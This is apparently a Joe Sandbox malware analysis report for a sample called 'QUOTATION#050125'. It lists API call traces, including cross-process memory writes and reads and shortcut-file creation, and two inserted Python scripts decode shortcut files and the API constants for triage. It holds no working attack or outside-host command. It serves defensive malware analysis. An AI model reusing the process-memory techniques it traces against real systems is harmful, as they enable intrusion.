                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 842720411-0
                                                                                      • Opcode ID: 1e87e32831bbcc18d5c7d10a1cc3a9ef4ec96ec3fdd70a9ad90af60ffcb91f25
                                                                                      • Instruction ID: 6dc3499f66fdeb4a483e2d32bb9ed5e1c05717da8b5a265f3a481bbd5214dee2
                                                                                      • Opcode Fuzzy Hash: 1e87e32831bbcc18d5c7d10a1cc3a9ef4ec96ec3fdd70a9ad90af60ffcb91f25
                                                                                      • Instruction Fuzzy Hash: 21016D79100315FFDB114F64EC49A6A3F6EEF89361B140414FA41D7350DB31DC50CAA0
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00120FCA
                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00120FD6
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00120FE5
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00120FEC
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00121002
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 7a5c5489eca32673e393974af274d1c48aed29d375b5ecd38dc37a7b758cabb2
                                                                                      • Instruction ID: ae8e797b54ed9d018ad681d0893b3e53d6a99649b88dd89e95091f0c9049a9ad
                                                                                      • Opcode Fuzzy Hash: 7a5c5489eca32673e393974af274d1c48aed29d375b5ecd38dc37a7b758cabb2
                                                                                      • Instruction Fuzzy Hash: E7F04F39100315FFDB214FA5AC89F5A3BADEF89762F104414F945CA291CA70DC908AA0
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 0012102A
                                                                                      • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00121036
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00121045
                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 0012104C
                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00121062
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 44706859-0
                                                                                      • Opcode ID: 8da0688ff3aa13191febc7d76d0e7a451bd031ed38778d45327fc9a525967a93
                                                                                      • Instruction ID: c1653278e230066f064cd2500560ca5a34502c43c411f12f79a10f8166c6cbda
                                                                                      • Opcode Fuzzy Hash: 8da0688ff3aa13191febc7d76d0e7a451bd031ed38778d45327fc9a525967a93
                                                                                      • Instruction Fuzzy Hash: 1DF04F39100355FFDB215FA5EC49F5A3BADEF89762F200414F945CA290CA70D8908AA0
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130324
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130331
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 0013033E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 0013034B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130358
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,0013017D,?,001332FC,?,00000001,00102592,?), ref: 00130365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: b4de72970c704654712b5ffaae75d8b8ca4363b9257d67d64cff18660d0b4a00
                                                                                      • Instruction ID: 36a4b1e9267a30400de3479db76df40592e8db6ac58a41bc8f677a82a173a13d
                                                                                      • Opcode Fuzzy Hash: b4de72970c704654712b5ffaae75d8b8ca4363b9257d67d64cff18660d0b4a00
                                                                                      • Instruction Fuzzy Hash: 31019872800B15DFCB32AF66D8A0812FBF9BF642153158A3ED19652931C3B1A998CE80
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00125C58
                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00125C6F
                                                                                      • MessageBeep.USER32(00000000), ref: 00125C87
                                                                                      • KillTimer.USER32(?,0000040A), ref: 00125CA3
                                                                                      • EndDialog.USER32(?,00000001), ref: 00125CBD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3741023627-0
                                                                                      • Opcode ID: af7bffcce8f5a4dedd386e093c86a0018839ff9a539eeb7e050be94ff956a3f0
                                                                                      • Instruction ID: 0b890fe14db93620f30d0b2c49164e126f61e0ddbf03dc2cfa188ebf058889ab
                                                                                      • Opcode Fuzzy Hash: af7bffcce8f5a4dedd386e093c86a0018839ff9a539eeb7e050be94ff956a3f0
                                                                                      • Instruction Fuzzy Hash: 4D018630500B14EFEB255F10ED8EFA677BDBB04B06F000559A583A55E1EBF0AAE48B90
                                                                                      APIs
                                                                                      • EndPath.GDI32(?), ref: 000D95D4
                                                                                      • StrokeAndFillPath.GDI32(?,?,001171F7,00000000,?,?,?), ref: 000D95F0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000D9603
                                                                                      • DeleteObject.GDI32 ref: 000D9616
                                                                                      • StrokePath.GDI32(?), ref: 000D9631
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                      • String ID:
                                                                                      • API String ID: 2625713937-0
                                                                                      • Opcode ID: 7a82e0304ac4b490f9c3c951ec0800a4157eb697475086fa59e983aec0f3d429
                                                                                      • Instruction ID: dbeab94d337b0dc8d52bf98d906ebf92e563f548e991b312f249c0a3c6cd05f8
                                                                                      • Opcode Fuzzy Hash: 7a82e0304ac4b490f9c3c951ec0800a4157eb697475086fa59e983aec0f3d429
                                                                                      • Instruction Fuzzy Hash: 6EF0373400670AFFDB625F69ED5CB683BA1EB003AAF048226F425599F0C73189D1DF64
                                                                                      APIs
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                      • CoInitialize.OLE32(00000000), ref: 00135995
                                                                                      • CoCreateInstance.OLE32(0015FCF8,00000000,00000001,0015FB68,?), ref: 001359AE
                                                                                      • CoUninitialize.OLE32 ref: 001359CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3769357847-24824748
                                                                                      • Opcode ID: 96ae7aaf4f45f504de1a72acfd6c2d9399b5508efcb8d881ad92f59ac07c07a5
                                                                                      • Instruction ID: d046deeca5c90afedf59c3c2adf6e577c98fc09c0d523a38f3b7b8c8d7ec895b
                                                                                      • Opcode Fuzzy Hash: 96ae7aaf4f45f504de1a72acfd6c2d9399b5508efcb8d881ad92f59ac07c07a5
                                                                                      • Instruction Fuzzy Hash: 42D13071608601DFC714DF24C484A6EBBE6EF89B14F14885DF88A9B362DB31ED45CB92
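The record above pairs COM object creation (CoInitialize / CoCreateInstance / CoUninitialize) with the string ".lnk", so any shortcut file the sample writes is an artifact worth pulling from the sandbox and decoding. The following parser is an added example for this report, not code from the sample, from AutoIt or from Joe Sandbox: it reads the on-disk MS-SHLLINK layout (ShellLinkHeader, optional LinkTargetIDList and LinkInfo, then the StringData sections) and pulls out the fields that matter for triage, such as the show command, the relative target path and the command-line arguments. The shortcut it parses is constructed in the block itself (the paths and arguments in it are invented for the demonstration), and the CLSID of the COM class the sample instantiates is not recoverable from the record, so nothing here claims which interface was used.

```python
import struct

# MS-SHLLINK constants (from the published specification).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
LINK_FLAGS = {
    0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
    0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
    0x40: "HasIconLocation", 0x80: "IsUnicode", 0x100: "ForceNoLinkInfo",
}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections in on-disk order; each is present only if its flag is set.
STRING_DATA = [(0x04, "NAME_STRING"), (0x08, "RELATIVE_PATH"), (0x10, "WORKING_DIR"),
               (0x20, "COMMAND_LINE_ARGUMENTS"), (0x40, "ICON_LOCATION")]
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def require_bytes(data: bytes, off: int, n: int) -> None:
    """Refuse to read past the end of a truncated or malformed shortcut."""
    if off + n > len(data):
        raise ValueError(f"truncated shell link: need {n} bytes at offset {off}, have {len(data) - off}")


def parse_lnk(data: bytes) -> dict:
    require_bytes(data, 0, HEADER_SIZE)
    if struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    flags, attrs, ctime, atime, wtime, size, icon, show, hotkey = struct.unpack_from("<IIQQQIIIH", data, 20)
    info = {
        "flags": [name for bit, name in sorted(LINK_FLAGS.items()) if flags & bit],
        "file_attributes": attrs, "file_size": size, "icon_index": icon,
        "show_command": SHOW_COMMANDS.get(show, show), "hotkey": hotkey, "strings": {},
    }
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:            # skip LinkTargetIDList: IDListSize (2 bytes) + item IDs
        require_bytes(data, off, 2)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:          # skip LinkInfo: LinkInfoSize covers the whole structure
        require_bytes(data, off, 4)
        off += struct.unpack_from("<I", data, off)[0]
    for bit, name in STRING_DATA:      # CountCharacters (2 bytes) followed by the string, no terminator
        if not flags & bit:
            continue
        require_bytes(data, off, 2)
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        require_bytes(data, off, count * width)
        raw = data[off:off + count * width]
        off += count * width
        info["strings"][name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    info["extra_data_offset"] = off    # BlockSize-prefixed ExtraData blocks follow from here
    return info


def triage_notes(info: dict) -> list:
    """Plain-language observations an analyst would record for a shortcut dropped by malware."""
    notes, s = [], info["strings"]
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        notes.append("target window starts minimized and inactive")
    if "HasLinkTargetIDList" not in info["flags"] and "RELATIVE_PATH" in s:
        notes.append("no IDList; target is resolved only through the relative path")
    if "COMMAND_LINE_ARGUMENTS" in s:
        notes.append("carries command-line arguments: " + s["COMMAND_LINE_ARGUMENTS"])
    return notes


def pack_string(s: str) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_sample_lnk() -> bytes:
    """Constructed sample shortcut (not a file from the analysed sample): Unicode strings, no IDList/LinkInfo."""
    flags = 0x08 | 0x10 | 0x20 | 0x40 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20,        # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,     # Creation/Access/Write FILETIMEs left zero
                         0, 0,        # FileSize, IconIndex
                         7,           # ShowCommand = SW_SHOWMINNOACTIVE
                         0, 0, 0, 0)  # HotKey, Reserved1, Reserved2, Reserved3
    body = (pack_string("..\\..\\..\\Windows\\System32\\cmd.exe")   # invented relative path
            + pack_string("C:\\Users\\Public")
            + pack_string("/c echo constructed-sample")             # invented arguments
            + pack_string("%SystemRoot%\\System32\\shell32.dll"))
    return header + body + struct.pack("<I", 0)   # TerminalBlock closes ExtraData


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    print(parsed)
    print(triage_notes(parsed))
```

Running the block parses its own constructed shortcut; on a real artifact call `parse_lnk(open(path, "rb").read())`. The parser deliberately skips the IDList and LinkInfo structures rather than resolving the target through them, and every read is bounds-checked first, so a shortcut with a bogus size field raises instead of reading garbage.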
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0012C6EE
                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0012C79C
                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0012C7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$Default
                                                                                      • String ID: 0
                                                                                      • API String ID: 1306138088-4108050209
                                                                                      • Opcode ID: 2ef133de3537133c694dda658221fa62b40f066d9c06ff162c16397898bc2ea7
                                                                                      • Instruction ID: 10c18c4ea0c7169c71e02e6a9d18c5b5c5b16817a4b3233b83832011ba50ed38
                                                                                      • Opcode Fuzzy Hash: 2ef133de3537133c694dda658221fa62b40f066d9c06ff162c16397898bc2ea7
                                                                                      • Instruction Fuzzy Hash: AB51F1716043219BD7149F28E884BAF77E8AF49314F040A2DFA95E3291DB70DD64CBD2
                                                                                      APIs
                                                                                        • Part of subcall function 0012B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001221D0,?,?,00000034,00000800,?,00000034), ref: 0012B42D
                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00122760
                                                                                        • Part of subcall function 0012B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0012B3F8
                                                                                        • Part of subcall function 0012B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0012B355
                                                                                        • Part of subcall function 0012B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00122194,00000034,?,?,00001004,00000000,00000000), ref: 0012B365
                                                                                        • Part of subcall function 0012B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00122194,00000034,?,?,00001004,00000000,00000000), ref: 0012B37B
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001227CD
                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0012281A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                      • String ID: @
                                                                                      • API String ID: 4150878124-2766056989
                                                                                      • Opcode ID: b0543f6659b844c0bdff4520ecda633bfcd878c939e7a1a61d27224bea4ea4ab
                                                                                      • Instruction ID: 70930119dd3e87963004a217d3f5ebc86fc4ec36f4c91b555ef1675440e5438a
                                                                                      • Opcode Fuzzy Hash: b0543f6659b844c0bdff4520ecda633bfcd878c939e7a1a61d27224bea4ea4ab
                                                                                      • Instruction Fuzzy Hash: 27412D72900228BFDB10DFA4DD81ADEBBB8EF15300F004059FA55B7181DB706E55CBA0
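The record above is the call set that foreign-memory heuristics key on: GetWindowThreadProcessId, OpenProcess, VirtualAllocEx, WriteProcessMemory, SendMessageW and ReadProcessMemory in one function. Whether that is code injection or the ordinary way a GUI-automation runtime reads list-view and tree-view items out of another process's window is decided by the constants, which the report prints as raw hex. The following script is an added example written for this report, not code from the sample or from Joe Sandbox: it parses the "APIs" lines of a record (the lines embedded below are copied from the record above) and decodes the OpenProcess access mask, the VirtualAllocEx allocation type and page protection, and the SendMessageW message IDs against the SDK values. Only the constants that appear in this record are tabulated; anything else is reported as raw hex.

```python
import re
from typing import NamedTuple, Optional

# API-call lines copied from the "APIs" entries of the record above (the leading
# bullet and the "Part of subcall function" prefix are the report's own format).
REPORT_LINES = [
    "• Part of subcall function 0012B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001221D0,?,?,00000034,00000800,?,00000034), ref: 0012B42D",
    "• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00122760",
    "• Part of subcall function 0012B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001221FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0012B3F8",
    "• Part of subcall function 0012B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0012B355",
    "• Part of subcall function 0012B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00122194,00000034,?,?,00001004,00000000,00000000), ref: 0012B365",
    "• Part of subcall function 0012B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00122194,00000034,?,?,00001004,00000000,00000000), ref: 0012B37B",
    "• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001227CD",
    "• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0012281A",
]

# One report line: optional subcall prefix, API.MODULE(args), call-site address.
# The argument list is optional because some lines (e.g. "DeleteObject.GDI32 ref: ...") omit it.
LINE_RE = re.compile(
    r"^\W*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# Windows SDK constants, limited to the values needed to read this record.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
MEM_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Common-control messages: LVM_FIRST = 0x1000 (list view), TV_FIRST = 0x1100 (tree view).
WINDOW_MESSAGES = {0x1004: "LVM_GETITEMCOUNT", 0x1073: "LVM_GETITEMTEXTW",
                   0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST"}


class ApiCall(NamedTuple):
    api: str
    module: str
    args: tuple              # int for 8-digit hex literals, None for '?', str otherwise
    ref: int                 # address of the call site
    subcall_of: Optional[int]


def parse_arg(token: str):
    token = token.strip()
    if token == "?":
        return None
    m = re.match(r"^([0-9A-Fa-f]{8})(?:\(.*\))?$", token)   # e.g. "00000003(TokenPrivileges)"
    return int(m.group(1), 16) if m else token


def parse_api_line(line: str) -> ApiCall:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = tuple(parse_arg(a) for a in m["args"].split(",")) if m["args"] else ()
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                   int(m["sub"], 16) if m["sub"] else None)


def decode_flags(value: int, table: dict) -> list:
    """Name every known bit in value; leftover bits are kept as one hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def cross_process_summary(calls) -> dict:
    """Decode the process-access mask, allocation flags and control messages of one function."""
    s = {"rights": [], "alloc": [], "protect": None, "executable": False,
         "reads": False, "writes": False, "messages": []}
    for c in calls:
        if c.api == "OpenProcess" and isinstance(c.args[0], int):
            s["rights"] = decode_flags(c.args[0], PROCESS_RIGHTS)
        elif c.api == "VirtualAllocEx" and isinstance(c.args[3], int) and isinstance(c.args[4], int):
            s["alloc"] = decode_flags(c.args[3], MEM_TYPES)
            s["protect"] = PAGE_PROTECT.get(c.args[4], hex(c.args[4]))
            s["executable"] = bool(c.args[4] & 0xF0)   # every PAGE_EXECUTE* value lives in bits 4..7
        elif c.api == "WriteProcessMemory":
            s["writes"] = True
        elif c.api == "ReadProcessMemory":
            s["reads"] = True
        elif c.api == "SendMessageW" and isinstance(c.args[1], int):
            s["messages"].append(WINDOW_MESSAGES.get(c.args[1], hex(c.args[1])))
    return s


if __name__ == "__main__":
    for key, value in cross_process_summary([parse_api_line(l) for l in REPORT_LINES]).items():
        print(f"{key:>10}: {value}")
```

For this record the decoder shows an access mask of PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION (0x438), a MEM_COMMIT allocation with PAGE_READWRITE protection (no execute bit), and tree-view messages for the SendMessageW calls; the caller's stack, as printed in the OpenProcess and ReadProcessMemory lines, also carries LVM_GETITEMCOUNT (0x1004) and LVM_GETITEMTEXTW (0x1073). A non-executable buffer that is written, handed to a window via a control message and read back is the signature of cross-process control reading rather than of code injection, so a function with PAGE_EXECUTE_READWRITE or a thread-creation call in the same record would deserve very different scrutiny.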
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0012C306
                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0012C34C
                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00191990,00A898B8), ref: 0012C395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
